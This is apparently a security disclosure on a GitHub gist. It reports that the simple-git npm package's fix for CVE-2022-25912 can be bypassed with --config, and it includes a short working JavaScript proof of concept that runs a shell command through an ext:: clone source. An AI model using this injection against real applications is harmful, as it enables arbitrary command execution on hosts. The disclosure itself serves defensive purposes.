Skip to content

Instantly share code, notes, and snippets.

@KKC73

KKC73/PoC.md Secret

Last active March 11, 2026 07:43
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save KKC73/02d1d97f3410756095b501fda0ac8ca6 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save KKC73/02d1d97f3410756095b501fda0ac8ca6 to your computer and use it in GitHub Desktop.
Download ZIP
Remote Code Execution (RCE) in simple-git
Raw
PoC.md

Summary

The mitigation for CVE-2022-25912 appears to block the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.

Vulnerable Code

image

PoC

const simpleGit = require('simple-git')
const myGit = simpleGit()
myGit.clone('ext::sh -c touch% /tmp/pwned_by_kkc% >&2', '/tmp/example-new-repo', ['--config', 'protocol.ext.allow=always'])

Proof of Success

image

Impact

Applications that pass attacker-controlled input into the options argument of the clone function in the simple-git npm package may allow arbitrary command execution on the host running the Node.js process.

Affected versions: >=3.15.0

No patch available

Tested on linux system

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment